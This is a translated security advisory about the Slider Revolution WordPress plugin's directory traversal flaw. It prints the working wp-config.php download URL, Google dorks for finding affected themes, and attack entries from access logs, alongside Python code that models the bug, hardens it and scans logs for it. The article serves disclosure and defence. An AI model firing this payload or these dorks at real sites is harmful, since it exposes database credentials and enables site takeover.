About two months ago, a serious security vulnerability in the Slider Revolution Premium WordPress plugin was publicly disclosed: it lets an attacker remotely download arbitrary files from the server.
A proof of concept (PoC) circulating on underground forums shows that an attacker can easily download the configuration file wp-config.php:
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
This is typically used to obtain the database credentials, which let the attacker take control of your site through the database (if the database port is reachable from outside). wp-config.php also holds the authentication keys and salts, so after a successful download both the database password and those keys should be rotated.
The original post calls this a local file inclusion (LFI) attack; more precisely it is a directory traversal that yields an arbitrary file read, since the file is returned to the client rather than included and executed. Either way, the attacker can reach, view and download any local file that the web server process is allowed to read.
The vulnerability is very serious, and because many commercial themes ship with Slider Revolution bundled, a large number of WordPress themes are affected as well; the exploit-db entry below lists several of them:
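To make the traversal concrete, here is an added Python model of the bug and of a hardened handler; it is not the plugin's own PHP code. It builds a throwaway directory with a constructed wp-config.php one level above an image directory, shows that an unchecked join of the client-supplied img value walks out of that directory, and shows how canonicalising the path and checking containment stops it. The directory layout, file contents and function names are assumptions for the example.

```python
"""Model of the traversal behind revslider_show_image, beside a hardened check.

Added example (Python), not the plugin's code. The directory tree, the file
contents and the handler names are constructed for illustration.
"""
import os
import tempfile

# Constructed sample contents; a real wp-config.php holds DB_USER/DB_PASSWORD and the salts.
FAKE_CONFIG = b"<?php define('DB_PASSWORD', 'constructed-secret');"
FAKE_IMAGE = b"\x89PNG\r\n\x1a\nconstructed-image-bytes"


def make_site() -> str:
    """Create <root>/wp-config.php and <root>/images/slide.png; return <root>."""
    root = tempfile.mkdtemp(prefix="revslider-demo-")
    os.mkdir(os.path.join(root, "images"))
    with open(os.path.join(root, "wp-config.php"), "wb") as f:
        f.write(FAKE_CONFIG)
    with open(os.path.join(root, "images", "slide.png"), "wb") as f:
        f.write(FAKE_IMAGE)
    return root


def show_image_vulnerable(image_dir: str, img: str) -> bytes:
    """Unchecked join: 'img' is trusted, so '../wp-config.php' walks out of image_dir."""
    with open(os.path.join(image_dir, img), "rb") as f:
        return f.read()


def show_image_hardened(image_dir: str, img: str) -> bytes:
    """Resolve the path and refuse anything that lands outside image_dir.

    realpath() collapses '..' segments and symlinks, so the decision is made on
    the final filesystem location, not on the string the client sent.
    """
    base = os.path.realpath(image_dir)
    target = os.path.realpath(os.path.join(base, img))
    # commonpath rather than startswith, so that '/site/images-old' is not accepted as '/site/images'
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing path outside image directory: {img!r}")
    # Defence in depth: an image endpoint has no reason to serve .php or other non-image files.
    if os.path.splitext(target)[1].lower() not in {".png", ".jpg", ".jpeg", ".gif"}:
        raise PermissionError(f"refusing non-image extension: {img!r}")
    with open(target, "rb") as f:
        return f.read()


def demo() -> dict:
    """Run both handlers against the PoC payload and against a legitimate image."""
    root = make_site()
    image_dir = os.path.join(root, "images")
    results = {
        "vulnerable_leaks_config": show_image_vulnerable(image_dir, "../wp-config.php") == FAKE_CONFIG,
        "hardened_serves_image": show_image_hardened(image_dir, "slide.png") == FAKE_IMAGE,
    }
    try:
        show_image_hardened(image_dir, "../wp-config.php")
        results["hardened_blocks_traversal"] = False
    except PermissionError:
        results["hardened_blocks_traversal"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The containment check is done after realpath() on purpose: rejecting the literal string ".." is easy to bypass with encoding tricks or symlinks, whereas comparing resolved paths answers the only question that matters, namely where the open() will actually land.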
http://www.exploit-db.com/exploits/34511/
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/

# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/

# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum

# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/

# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/

# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/

# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/

# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
Site owners and security staff should patch their sites as soon as possible. Note that a copy of the plugin bundled inside a theme is not updated by the plugin's own updater; it is only fixed when the theme vendor ships an updated theme, so check the version of the bundled copy as well.
The matching entries in your server's access log look like the fragment below. These requests were answered with 403, meaning they were blocked; a 200 response with a body of a few kilobytes would mean the file was actually served and the credentials in it must be rotated:
194.29.185.106 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1082
85.103.12.6 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 226
91.229.229.201 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 226
85.103.12.6 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1
85.103.12.6 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11
94.242.246.23 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11
74.120.13.132 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11
77.247.181.165 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1
37.148.163.38 - - [02/Sep/2014:...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 7269
37.130.227.133 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11
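Grepping for the literal string "../wp-config.php" misses URL-encoded variants and says nothing about whether an attempt succeeded. The following added Python scanner (not part of the original post) parses combined-format access log lines, decodes the img parameter, flags any revslider_show_image request whose img value traverses upward, and separates blocked attempts (403) from ones answered with 2xx. The log lines inside it are constructed with RFC 5737 documentation addresses and full timestamps; the regular expression assumes the standard Apache/Nginx combined format and should be adjusted for a customised LogFormat.

```python
"""Scan a combined-format access log for revslider_show_image traversal attempts.

Added example (Python), not from the original post. SAMPLE_LOG is constructed:
documentation IP addresses, invented timestamps and byte counts.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
203.0.113.10 - - [02/Sep/2014:10:14:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1082 "-" "Mozilla/5.0"
198.51.100.23 - - [02/Sep/2014:10:14:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 226 "-" "Mozilla/5.0"
192.0.2.77 - - [02/Sep/2014:10:14:09 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php HTTP/1.1" 200 3120 "-" "python-requests/2.3"
198.51.100.23 - - [02/Sep/2014:10:15:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1 "-" "Mozilla/5.0"
203.0.113.40 - - [02/Sep/2014:10:16:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slide.png HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
203.0.113.41 - - [02/Sep/2014:10:17:00 +0000] "GET /wp-content/themes/Avada/style.css HTTP/1.1" 200 9912 "-" "Mozilla/5.0"
"""

# Standard combined format: ip ident user [time] "METHOD path PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)
# A '..' segment on its own, delimited by slashes, backslashes or string boundaries.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_revslider_traversal(path: str) -> bool:
    """True when the request targets revslider_show_image with a traversing img value."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("action", [""])[0] != "revslider_show_image":
        return False
    img = qs.get("img", [""])[0]
    # parse_qs already removed one layer of percent-encoding; decode once more
    # so a double-encoded payload such as %252e%252e%252f is still caught.
    img = unquote(img)
    return bool(TRAVERSAL_RE.search(img))


def scan(log_text: str):
    """Return (attempts per source IP, list of attempts that got a 2xx response)."""
    attempts = Counter()
    successes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_revslider_traversal(rec["path"]):
            continue
        attempts[rec["ip"]] += 1
        # 403 means the request was blocked; a 2xx means the file was most likely
        # served, so the database password and the keys in wp-config.php must be rotated.
        if rec["status"].startswith("2"):
            successes.append((rec["ip"], rec["ts"], rec["path"], rec["status"], rec["bytes"]))
    return attempts, successes


if __name__ == "__main__":
    attempts, successes = scan(SAMPLE_LOG)
    for ip, n in attempts.most_common():
        print(f"{ip:16} {n} attempt(s)")
    for ip, ts, path, status, size in successes:
        print(f"LIKELY SUCCESS {ip} [{ts}] {status} {size} bytes {path}")
```

Run it against a real log with scan(open("access.log").read()); anything reported as a likely success should be treated as a credential compromise, not just as noise, and the legitimate slide.png request in the sample shows that the endpoint itself is not the indicator, only an img value that leaves the image directory.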
Source: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Translated by: SP editor
SP address: http://www.secpulse.com/archives/106.html
Author of this article: SP editor
This article was published by a SecPulse column author; please credit the source when reposting: https://www.secpulse.com/archives/106.html